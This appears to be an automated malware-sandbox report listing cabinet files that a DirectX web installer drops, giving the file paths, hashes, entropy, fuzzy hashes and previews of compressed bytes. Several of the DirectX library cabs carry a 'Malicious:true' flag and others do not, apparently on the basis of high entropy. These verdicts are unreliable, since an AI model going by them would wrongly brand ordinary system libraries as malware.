                                                                                              SHA-512:01B818AA5188CDE3504E289AEDCA2D31A6C5AED479B18A2C78271828AE04BEBCD4082051B7F4EECA8A31E8EE5ADBA158420ECDCB21371C735E4781EE5F661DBF
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D...............Y#..............#..............1....).........6{. .d3dx10_33_x86.cat.p%...)....l6O. .d3dcompiler_33.dll.h...2O....o6=. .d3dx10_33.dll............6E. .apr2007_d3dx10_33_x86.inf.I...7......6E. .d3dx10_33_x86.inf.i..........6E. .d3dx10_33_x86_xp.inf..j"(.2..CK.y<...........l.al..)e.!a.&...l3.-.h....j.,."D.R..O...%W).gFn........}.z5..<s..s>.s>..|...U*x...Z..!..E..U...<$.....y0.sPH)....<..<.4.M.@...U.......\).@..6.'.Yi.!.....R.@.&..X..i..z..Y....`...C...).Cz...p.9H$...t@....I.s....;.[.C+A"..<.7.w3..A..u...s8$....ma.Y5.3.e C.e.yAAP ...@L..8.,?..h.a..E2=..9=.......e5|a./3B"q....Zh.P...6P.."....k....:.w..:.h%.....H.0u......+..D.+!..-...9.sD...O...QZ.a..8v#......Q..N..l%....c..?P..........>.....~......0.F.VB!1ii..v5.4.R.R.....LX.X.........w.8.'.~..p.8.......A......6w.\...~..[.B.E.!..h....uQR..q.....O.....R......Cth-.....$z..B..00.l.Uo.. '..m..fB..}...ij....<..RX._......k .k1.xH......A3y.<~V>.s^gV.8+.;+...CP..+. &.....PH..).UA{...E..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx9_33_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1600079 bytes, 5 files, at 0x44 +A "d3dx9_33_x86.cat" +A "d3dx9_33.dll", flags 0x4, ID 7180, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1609247
                                                                                              Entropy (8bit):7.999284261824255
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:4cQY0tIpwa5ydxGuruluTsRWo1Iq9e5m98yiN9/0rjVH60mPxr/1MQK:4cIIi+G9rul8uooec98yi//0rjoDZrCF
                                                                                              MD5:A5915EC0BE93D7EEBE8800CE761EE6DC
                                                                                              SHA1:E8BBC21C2B5F0E5801286F07E3DA09DBC67C3961
                                                                                              SHA-256:EFA2E6DE548401376A575E83A79DE019AA38F191D63FDEF3BD2B07D8CB33E3D7
                                                                                              SHA-512:02259FF3C8478CBA134A8F8408AA624B7165CED97C0AED8C9626034599DD5439F84D1AF9EEFC4191898B0A524E5FFAFB9875EC00E740CEBE97EAC4C2DD0E31AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Oj......D...........................Oj...#..............l....(.........6{. .d3dx9_33_x86.cat.hW5..(....l6O. .d3dx9_33.dll.\.....5....6B. .apr2007_d3dx9_33_x86.inf.....\.5....6B. .d3dx9_33_x86.inf.,...g.5....6B. .d3dx9_33_x86_xp.inf.6^]Z.;..CK.y<.....Y.[.J..".<3..K.AJ.CQa.&a..-.L.vE...")[e..!E)e...(q.W).g..t...?.....Ws^...|.9...9.=.3..L.XN.U.&... ...L.p.b ..,....$.BJp@0.....@#.x^D*...T.`~N./J~... ..A6..Tj.....s.....a...A.....#YV..`&B.m...!"....O.h.x.....!M ..e. k@...$C.7..F...7.%...............C".Xk..V..Y...*..9...B>.n......J..<......{..w.MORA....v...H..l%.....`...;l.:..T@'Y]..9,H.`.,....A.....u..p.a.....D./!..VZ..1P..I......C..........9..4..1.z......h....W...~.}"hK.m..sA..}<;..w...,8.[a.y.!X...HM....qf.!....i.~.m`.O5...T&......2?...,%#.YCTh......H....@.a........?....7..}.+.c.S.\...-.%`.......1...5......24..........5.....yy-v..R.......{.C*..@"....n..C.I.`.ZX....@.MH.*.+9Q[.|.rD.j ...A.(.Vb.ZZx.f......F..}h..X....~[.Cs.S|....RV9JT.k.....c....C...

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2007_xinput_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 90857 bytes, 6 files, at 0x44 +A "xinput1_3_x64.cat" +A "xinput1_3.dll", flags 0x4, ID 9350, number 1, extra bytes 20 in head, 6 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100025
                                                                                              Entropy (8bit):7.988437274786544
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:Mt5OSvuXSf2rbZu4Kmsr4eLRwPC5B9y7q:MTOBXSSpFI4/PM/ye
                                                                                              MD5:FAE84E0773A74F367124C6D871516B7B
                                                                                              SHA1:CAF8B9D7D4AF965BF445D052D1E835B680D6BBC3
                                                                                              SHA-256:86EE073C199B5080FE4F5BE6AC24BB1117FEA42E4BBCD828B4F0EC26C669B22C
                                                                                              SHA-512:CAF1381CAE7417B57FAEF56D0023BF90C90406748F8813AB85C687DDB81E2498D2F1D5F4BC154903FD5A19836E6F245CD6F5D3927A383F1ACC3BCC41B58FD09B
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....b......D................$...........b...#...................(.........6+. .xinput1_3_x64.cat.h....(.....6. .xinput1_3.dll.h..........6.. .infinst.exe.\...h......6H. .apr2007_xinput_x64.inf............6G. .xinput1_3_x64.inf.....a......6H. .xinput1_3_x64_xp.inf...<.6..CK.\.\S.?....H3`@....B.....t.....D!.! " ].{..`AW........b.k/(....fNN ..z.}...g..of.7...|3#.]4.j...."V.;u.".,..t.....*.. o.!G4.G.<........!.I.P.'..t-B..T.N5...U.......2..S.....:....Ju.S.Q..v"D%..y.KR..B...a (.4.....7......x!L.\..u@.@...B.-G0......A..g...Dj8.j..L.X.."0."...^...kP.&@.}.....PP..k.p..|.`..P..D"... .H.1.h.^.G...#...+Ls..7..!qH."@..."..;,....Iz;u.t....>..Ki.y.~.5M`)SR(..$....&P:........-F...@....-..C.&V....N...Z..!....~.....{X"eo.5.D6.u...Y.9...8.......pg8....g....4....j@.S..T..C.H..7..ID...!.HP}.....7U..@?1".yMi....aA.....[..&.M.0A..'L,.q. 6`..DZ...i2.t..(Sw...e..X..6 ..y$...>....D.&R......>....~..U.Z...X.B.5:HAn.IU..[ .*.MH...8..Tgg'.H.G$H.$........)a...E b.y.>........t.....dF.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2007_xinput_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 47342 bytes, 5 files, at 0x44 +A "xinput1_3_x86.cat" +A "xinput1_3.dll", flags 0x4, ID 8235, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):56510
                                                                                              Entropy (8bit):7.973777529821975
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:BcnwcwzHEdb27WH2SfZDNu75ddnVR+ZFaNk0ZKn4:4wb+2eZonQwt
                                                                                              MD5:B362EC93463D8B6381A864D35D38C512
                                                                                              SHA1:7CE47EBCEDA117D8B9748B5B2D3A6AE99FC239DF
                                                                                              SHA-256:B6C1166C57D91AFEEEAA745238D0D6465FF2084F0606FD29FAF1BFA9E008A6C5
                                                                                              SHA-512:CC57733912E2A296A11CD078372C3B43F1256A93EC5BECD0D1B520EB210FCE60938AA1CAA6DBBCA03292A05495B5ECD212EE5F77E3EBABB11EF31F1975B2D09E
                                                                                              Malicious:false
                                                                                              Preview:MSCF...........D...............+ ..............#...................(.........6{. .xinput1_3_x86.cat.h?...(.....6.. .xinput1_3.dll......h.....6G. .apr2007_xinput_x86.inf......m.....6G. .xinput1_3_x86.inf./....p.....6G. .xinput1_3_x86_xp.inf.i...T5..CK.y<.....Y.d..H.<3.1....=...`,cbB.f...*R*kB..V..E...,.[$I.R(~g..n........}....<....y>.9.s.....f*&.s)E.F..Cp ..Q...D 0<0.;....R.....3.\...4...F.1QI...........@..O....2.f....I\...a...c4.0.....,...0.!..6.. M...@..:..ocp.A.K6......... .F..!...[....+..,...0n...<..@cl`+Xe^.X.t.$.;{X@.P....@d..N=.....Z..g....&...#...%]....~.........C. #..u...h(.4^.4.... a.a...*#.Z<....%.{..5..n$....P@[..C<01..Y...F.\..[.H.H.l..f.l.X.0...l.4.A....+B.~.|.l.YO0..k}i>~V..O.f...M0n^.?..B..........a.......N.w/==J.{..D@0..Q.....%..@6..Z.|......@@.4..a.....q......t....4v....dI.Ym..^...........[7.XH.8Y.nR..d.<.;O.."k...d.y2aV..4....D...5..B".H~.....+x_o.4....c.#.`..0...v.F4........I.Q$.....x....._..;]...O[....l....?..:.......Q._....2.;.~...NXz

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2005_d3dx9_27_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1071684 bytes, 5 files, at 0x44 +A "d3dx9_27_x86.cat" +A "d3dx9_27.dll", flags 0x4, ID 6926, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1080852
                                                                                              Entropy (8bit):7.999138982152864
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:sP2N00PXWcq4UsDMMlsOgDUaQFMBZ0To2xIG:sP2CuZQsVl96fQiZMo2xz
                                                                                              MD5:3E91448A7481A78318DCE123790EE31A
                                                                                              SHA1:AE5FE894790624BAD3E59234577E5CB009196FDF
                                                                                              SHA-256:8C062B22DC2814D4F426827B4BF8CFD95989FD986FB3AAA23438A485EE748D6D
                                                                                              SHA-512:F8318BD7CA4271FC328D19428E4688DA898B6D7FB56CC185AD661D4A18C8169392C63515D7DD2D0B65CBD1F23892D7A0A5D3D77A4CDA6230BA03B3B917E5C39A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....DZ......D...........................DZ...#..............H...<..........2.. .d3dx9_27_x86.cat..d#.<......2b. .d3dx9_27.dll.......#....2.. .aug2005_d3dx9_27_x86.inf.......#....2.. .d3dx9_27_w9x.inf.....p.#....2.. .d3dx9_27_x86.inf.]Z...>..CK..X.[...C.)...1(v.).. 3."J.P.. @(.&.Y..v...].....{.cW.$("..w.....yN<?v.5k.......q.Y..0......Z&.9N.!.....f.0.X...9b......fF......iL..+c...ff.tx.f....no.II...2.LO6..arY...u*..PZM..9.6f..H.<...._..G".K.1...R.I..|......=!....\O}<[/E.#..>.......+...........v!..C..:..Q.$.....s....LD.Q.i....h....b*..aB3c.a.b.W..c.151/,./r.rD>...(.i..%!.......\.......Sn.|t.[{F..Mq..\..5.d......J....J.3&....jN../S_N...Qg...gA..3..:...T.0f7.k..&.a.{o.+.j....:..j.f.s..54..`.}..g......?h....bf...w.(......C)(...$.........gJ~..`.;..P>...e.......c.C..@K...d0.@M0(.YM$.y..78..U.Y...J........W......A.04)...&4..{?....Ce..W.;..0m..x.9......n....Io!.!.>...o.......],OQ..0.Q..[KR5QrU.2)I...m.kU."<^..S..3.Q.....".b.F..UF.uJ....:lZ...p.2.R.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2006_xinput_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81182 bytes, 5 files, at 0x44 +A "xinput1_2_x64.cat" +A "xinput1_2.dll", flags 0x4, ID 7454, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90350
                                                                                              Entropy (8bit):7.985841057262195
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:5lQFOMW9t2gGQtmxC4LbB8GXjgvW/j44krD+W2MLdk6v5yO1Ha6DB/4RPjz6ITda:rIOMWm+tmnbXjVkWW1lgO166cjz6z
                                                                                              MD5:A9D582E44E46E36F37EDB7CBC761179D
                                                                                              SHA1:ED1BEF64385E94CE89AFA704D38408E23B31FA79
                                                                                              SHA-256:C26633D38E0A91B9BE70382E916A83D50E219609F7E05CFB2D27DFAFBE480B43
                                                                                              SHA-512:20011BFB547DEDCE8E6FCEDA22C3A3A83DB140E8A20844F3B0E8741B4474C1FEA73D84708B801E83EAE3CD2D8A2D6C851C3F7CD0154C0382A78BC2C2DF6B01E5
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....=......D............................=...#.............................4.R .xinput1_2_x64.cat..G.........4.K .xinput1_2.dll......f.....4.K .infinst.exe.V...'m.....4}R .aug2006_xinput_x64.inf.....}p.....4}R .xinput1_2_x64.inf....%p9..CK.[.\SI.....I..1`D...]A......A....D .)4........E]...`.....^VV.........{.\.]......~./w.9s...9sf.E..k.....l@...Y....*...Cu4.....t......I.Q.<u)ey...k1...K0.)....u..+..{..&...Z....@=].X....'..$q*D...y.kZ.+..O..x .....F.@..........A.wd..........;......<@i.. ..s(G..J..".q.#..c.u...=.H<"A.H..C..;.>....43V.4..1y.;..j.yK"F}.F..#.RY.h.u.2.....p.C...u...b.:..E1.?f........H@]..;..DfR.T.%..-.....h....@...;...Z=@..pGb.b... .........n.....b>...R~...J...X...0.?..P7..........p6."/=.Z mI.r..X..x...ey...m#.>Pi.ZY.".....Xi..B..S.....7....=P7k}L..."bB.....;.....)...;..L...`B.PG.8.d..q....e.E*....D.T.$..H..X.A..,6..y.|..4..*.x...K.....o...6`mB.T+.B..0..[..Q4MS.D?.9j.+...<..'.0.9"...5.l-S...8.#H..XF..puM5#.8.R..7..2.L.p..'....\../.....a....

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2006_xinput_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40098 bytes, 4 files, at 0x44 +A "xinput1_2_x86.cat" +A "xinput1_2.dll", flags 0x4, ID 6335, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49266
                                                                                              Entropy (8bit):7.9632460736333766
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:OuG396sAA1wXXvVFc2755DkphtVmUkt/lnkvH0odpl/q1nk:vwQsAhFcSmpJ3kt/xcd7ek
                                                                                              MD5:16B968CA0C435EE45E77A84C2D0364A9
                                                                                              SHA1:90B17A60A34F6335787A6B2D489CBCD3A4EA98C8
                                                                                              SHA-256:6DD7C0ABE37D3DF7AA6DB7BB352260F4A15DC965FF9D30AA32FE9595C1A18300
                                                                                              SHA-512:3BBBFDF8B5673641EC066C3FB52E6B0D5CE0BC6ED6BFF17AB4AC3FA69A8628B09E5EC8322FC39D2A206974B54D297CAAFF9410197E26D090FE74F963CD535045
                                                                                              Malicious:false
                                                                                              Preview:MSCF............D................................#.............................4.R .xinput1_2_x86.cat............4.K .xinput1_2.dll............4}R .aug2006_xinput_x86.inf............4}R .xinput1_2_x86.inf.....>..CK.|.\SG..M.. @...mTT.0.(..D..M...+K0 ..D.`...T.Zkk.Am.V..k...V[l...+....*Z4....P..........&w.3g.9..\.Kz<tp..N.;.]Y...%=.!...b.............%v_88.t`qXK.;......B..3..c.8...................a...aA..C..)t...FP.q.%......'.B...("...D0.(..Al(..BY.<..."...s.!...1....&."...a..;6;h.P.#.X...p.H....c..q,..1.'..^.CL..h.C..h.%......f...S.l.'h.p.p.E.......\..G..1..'.)D>.Cd.JB..u.....6..i..A.>...&.......]..J....C..h."........x.......4....0.H.?..P.=.Z"zEaJU...F./...Y.t...~.o.y9<..9.l..7=.9_..d...!.r.F0...4..c2...a.3..y0..B..nD<.K...s!d.9|...p.0|a.U.a.=x.v$.OM.1u{...qQ,..._.R....y..f"...33...@... ......[..1.a.....0.x8..@.N.`i..0...b..c.wYs.L>&..9..A.......UXL.n..8x.....z......W+..... o.'.v.r...$g....R...4.u.r..J.P+......./o:C...Sg.g.&.3r..^.vG.v^...I.s...9..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2007_d3dx10_35_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 790907 bytes, 6 files, at 0x44 +A "d3dx10_35_x86.cat" +A "d3dcompiler_35.dll", flags 0x4, ID 9055, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):800075
                                                                                              Entropy (8bit):7.9986813742013325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:iTo6mZ4UtaxS5hNsXjnUQEnnR62vSNE6xr8M6:iTdwtqAUXjU7nQaSNvxo
                                                                                              MD5:DDC4AF0D53B477E5AF77942E7118B66E
                                                                                              SHA1:81AD8201DCF653A6E977C4506A274D0BAC12643C
                                                                                              SHA-256:9536166EE7CC1100CFE24E01532E8E4DEED6BAA838B4C025581F2CA046A25915
                                                                                              SHA-512:1E082D7E7855BC0AF6EC09D4A69FD4A1B0A3A31E4DE8FAA52FA0BDCD601C501ADA6216DDDB83058F37AB4A371068E0F344BDF42F2551943BE19BD719D99BA93C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....{.......D..............._#..........{....#..............8....).........6P. .d3dx10_35_x86.cat.p....).....6. .d3dcompiler_35.dll.h...2......6. .d3dx10_35.dll.c..........6F. .aug2007_d3dx10_35_x86.inf.I..........6F. .d3dx10_35_x86.inf.i...F......6F. .d3dx10_35_x86_xp.inf.. ......CK.y8............H.<3.1....=...`.&&[...m^...&D.l.%Z.TJ).....%.R..L...z.....{u]..<...y.....qn...e5\..1.1.....L.b.*D".x~....4....@0.....@#XD>D&.].T..........K..,.<(.81A.z.]..A....0.......Y.l......F[.C...R.`...8...$...A....2..8-..F..e.=j.J.ud..dM.I.........!.h..l.+..,....t9..r..!_h.D.. ..,3..hQsQnYE.+V.wL....;.....3#B"...Zh'...........2.Hx.....:2.%......:.&..'... .!.H.%.<..Tj......A3C.W..e....Dpe...]....!....&H.....I..~d...$C }.>.#...}3....X}.F..G!1....r6...WD.....L}.K..t.....)#...6.L.&...........)....9.!p.b....x.....{..f........s.a.U..^..,..3?.............Ck.....!.s.......`.oZk............K[i.g.....E7...f.7f...`.....3...F.....i.?K&.....d.,Yk.L...........,.L...D.Au..].8.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2007_d3dx9_35_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1702192 bytes, 5 files, at 0x44 +A "d3dx9_35_x86.cat" +A "d3dx9_35.dll", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1711360
                                                                                              Entropy (8bit):7.999186916403002
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:91jqFBu+YTN2MuQ4R6dPnknsGmQA+re+1ZGD+rCbaNHy196aqlF35RJT1q/P0a+8:9FyMTN57+MPO++rB44S1I/F35zhqFR
                                                                                              MD5:3ED592E6CDAE66B1C0671D9EC417A738
                                                                                              SHA1:9F083FFE00A8E5EABF282130CD16044B488B6E0D
                                                                                              SHA-256:4914D2B5C3251B00C0CC236F51AFE469728D92B50C953C66D213F079AC928EAC
                                                                                              SHA-512:0144DD9A83F953EABAAFF3C41F17A363100C9A2CCD932321A4AFE990D8FCB5A430E842DE9146C983409B6366CD974E318A535E6475B10839A6679844CB7D23B7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....0.......D...........................0....#..............s....(.........6P. .d3dx9_35_x86.cat.h.8..(.....6. .d3dx9_35.dll.\.....9....6B. .aug2007_d3dx9_35_x86.inf.....\.9....6B. .d3dx9_35_x86.inf.,...g.9....6B. .d3dx9_35_x86_xp.inf..n_.;..CK.y<.....Y.[.J.f.d.;c..l...."a..2&&[..E.BEY.EZl.%Z.(..%.+%I....3.[}...q..s?..|.w..=.s.s..y..2.S8y..........L.8.....0| .'.. .....LD.'.2'..c.ya.L.a...........C.....C.....^...T..x,.j.X....\.......2a2H.<`.`.c@. BwM(a.#..P....&[R.... $.B.....{....\....5.<$...q.t..qp..c.Z.*.J...DK...d...A@.....:t...^...X.....K...zg>......U.A..#..1v....`'d..d......A.Bf.@y.$a.d.....,.2W.=."t..........".p8.%......C.0....l.F.*.....X.Q......R.....]...c..Y.Y.<t.'...}.........gK....of...........8Gv6......O.....N!d.?...E...g3a....`...G.R2..-@.6@......\..`H$...4...&...g.6..M.........r2K.s.....FM(......}....hCJVC.T.y..@...C...d..Yk.L`....D..L....>d#.08\.h....&...&......ox...4.2......'*K....R...(E.*..@..6RH..A..t.1 ......s........).T..\.G..........w...

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2008_d3dx10_39_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843207 bytes, 6 files, at 0x44 "d3dx10_39.dll" "D3DCompiler_39.dll", flags 0x4, ID 8952, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):852375
                                                                                              Entropy (8bit):7.998886184584254
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:E6Ih4DqlkwAjhr1mB+uYgrCvCZNmJ9ndKo4XYbX:E664DQkwAj/oNCvCZIdN4ID
                                                                                              MD5:5380053AC4C344BD38604022476B1C1D
                                                                                              SHA1:043DC8F49BCA3BF0BD85E858F5C2EEDF68565C0D
                                                                                              SHA-256:84800C55F773D5D6913E344E41BABA58CF07CEC2E6C7114CA3BF48E8F355419F
                                                                                              SHA-512:F3CE2DEF6E2E8A1D2C07F627E3C437A1BBA0B2E456020A84121346472BE3D28E0FC69623BD408F35A2C639C83DD2787F998DEDFE42B7625DC71500824B035FEC
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................"...............#..............=....$.........8 X..d3dx10_39.dll......$.....8.X..D3DCompiler_39.dll.f(..(......8.2..d3dx10_39_x86.cat.I..........8.2..d3dx10_39_x86.inf.i..........8.2..d3dx10_39_x86_xp.inf.c...@......8.2..Aug2008_d3dx10_39_x86.inf.,"..%,..CK..\.....\./.R3...$...Hef.K0..D<....V..uvA4.J.yTx..YjvY..<.2.133.J.[...O.g.Q.J..gf.....r^.}..s~g..3...F..!...eB>$.e .~..Z.j@V....C]..-..-N.!.Dc.c2.lv..!0b......$&.n.....yH..cz./...|...w.;y../+.......l.|~...?...{..-<Us.(n..M.U...(Bz.I.WCc.q.I..uuu....2O.K}.~_x...P..B.D.P.].C-e..O..x.tJ.....Y....'o5%dE...+..../..".tp...Ap..i^.$.0W.....!...b../.W..y.B.....#.m.k}O.k..z...N........W.3.......S.F..].E..j,.;.xe..I`6p.V..._O..K`.H.C....f.....'..3@?@O..`...@&p..P...W..>HO.....,..CA........0...m.....D....0.....x.S...l.....'....`.....%....{....1y.t...Qp.t..{..A.0c.......k.....@!x......RA/.....@c......}...n.......`.x.L.cA...A ...P..S....2}{%".,....d8..^.K..p.xGE...+..\`:X.>.G.o.Y

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2008_d3dx9_39_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1458712 bytes, 5 files, at 0x44 "d3dx9_39.dll" "d3dx9_39_x86.cat", flags 0x4, ID 7173, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467880
                                                                                              Entropy (8bit):7.999682997096517
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ztDuVYfr3zZ3dHi+rHI8lVs1WutNXBoY4RbifcKly/kNwSh1mMbS8X/9Wv8PiL:JDnr3zZ31lVsgENSsfcKaZAFF88+
                                                                                              MD5:4379902C4180A9A6BF40B847372CEC5A
                                                                                              SHA1:C7FC8184D5620154B9BFD6FBC8820A78C4EEE592
                                                                                              SHA-256:61E703E8D231412F135B4ABA629122D9CB69AC9EE39FA3CBBE6B95DE05097A8B
                                                                                              SHA-512:9269F49A5CA90143C50B817E9F5AEC0FC4C32BA1B6D3A21CC5448CAD21A16A902540C8CFC1825B124CE39E0BDC479ADE4354B6BE15B2067E3033E04998E0710A
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....B......D............................B...#..............v.....:........8.X..d3dx9_39.dll.<'....:....8.2..d3dx9_39_x86.cat.....D.:....8.2..d3dx9_39_x86.inf.,...O.:....8.2..d3dx9_39_x86_xp.inf.\...{.:....8.2..Aug2008_d3dx9_39_x86.inf....$:..[.... .1......$Q.f...<....B..we..]w.QR..B.).V..i.k..Z........=......d.. .....2..cLfl..A..w4[..VBs.{...^...S..a..]Z...%vh...9..Ro...K..r.}..ZP......".i..5P..."..............."......I.c.on..F...&..K @T.=...C..a ..!..q...Pb.=........hY.b..i`AY..<xwqvlx,t......Yg..R....g1fG..i..4.o.......S_...V..N.K.N..qQ.....Etr.1...E..*:..|..../e..<...9.s.....%.RT. .M!.$(2b[X.NT.B...HT.?.!.<|4~.?........Si.Xe...l}....J.J|LN...R.o..@W!.y.8..t'....%A.!I..U.A>..~........*..u....2SR.[...9Te.?..U....y*.M.yxnx...z.J..V...(.....X.|...f.h.....?.LGt..UT...o.7.0..h[.P..`...`../$LED..'.E. |.A-.w...6.+.\;.h...H...........8...A...0.n....9- p..M. r.V.!...W...r.Y......BO.d...{4.. ....U..A ).....9f.e............`P..w[.......$..o.L1.~.R.M@\AC....W.%..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx10_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186171 bytes, 5 files, at 0x44 "d3dx10_42.dll" "d3dx10_42_x86.cat", flags 0x4, ID 7280, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):195339
                                                                                              Entropy (8bit):7.996178589789764
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:/hxMUzbnbaWbX0JkFvs5aQnkW6sJ/Fw395/lfLxBQLgGlekmQI84HAGujR7j:5CEbiqvs5aQnkW6A/8jlzxBw0/Erd1X
                                                                                              MD5:F264AF5A36B889B4F17EB4D4F9680B4F
                                                                                              SHA1:1DF087EA99D321EC96D0D2F1C66BEE94883D6F08
                                                                                              SHA-256:BB46189EB8CB7769EB7BE00CFBC35902072FA9408313EF53F423E5AE5C728F61
                                                                                              SHA-512:73AE1CF3CAFBA148F4E5B4D8AC12A7AA41F6ECAC86C139C6A7714F90F3DC61C444DC152A3AD3C2CA800C1A1F4955A2B508735F8490666B57D1420FB7A7BFC269
                                                                                              Malicious:true
                                                                                              Preview:MSCF....;.......D...............p...........;....#..................P.........$;....d3dx10_42.dll.....P.....$;...d3dx10_42_x86.cat...........$;...d3dx10_42_x86.inf.(.........$;...d3dx10_42_x86_xp.inf.c.........$;...AUG2009_d3dx10_42_x86.inf.|..f.0..CK..T.I....8*....e0.JVT`..Q......A..a@..i.k..........b.bN......fE.]...y...s._W..~.......9.6.0:../....^.._..F{.3......7.NHL.....T......Z.....Sd.)2W. Y.2Na....^.lk....+......V.J...j.W.vI.Xj.V....Y..^$....&.&....9..azKt..6.*...2..e..).,..6...0,......Z.a...R...k........(..V.E.....2..C....p>r..Y.].sR&....)....i.0.....W..#(.....j.p5.ZvR.!..:.jd..e............7:(..\....kZ..b^...s4W).. L.%......:g......./..5.......eW).....t.2..].... ..X.,.. ~80...v..k.#.1.2.....0..PF.....z.]......\.\.N.E.J`6....p.....@_..;...p.8........x.....y.6.(p.x..XJ..@O........E.v.0p...m4.8.,.6.%...P.lh.. ...B.g..0.....>v.....S.A......E@...0.P..@8....v.9..h....xc*e....'..`..._...........M.lg..P..-.!......L...@$0.........j5..m.{ .H.f.[...C@

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx11_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 99084 bytes, 5 files, at 0x44 "d3dx11_42.dll" "d3dx11_42_x86.cat", flags 0x4, ID 7285, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):108252
                                                                                              Entropy (8bit):7.991332626956763
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:MI9cI4N24813fwIsfQqzjoroJ1OL79D+0sFGmNjFRchFxLvk5yswFa8D+0qlt6s1:Pah8Vo/1uLJoGmZEFxLvcwM8DZcZxb
                                                                                              MD5:DD47F1E6DC19405F467DD41924267AD0
                                                                                              SHA1:85636EE0C4AF61C44D0B4634D8A25476CF203AE9
                                                                                              SHA-256:39FF69BA9161D376C035D31023D2FDEECB9148A2439ABE3AFD8F608F7E05E09B
                                                                                              SHA-512:F77C4CEF5CB7E927948F75C23A190E73D6C75B4F55915859046533A10AA3C5ABAC77D8BEF71A79368C499C85009213E542094B85B94B69E62AA66B60616777C3
                                                                                              Malicious:true
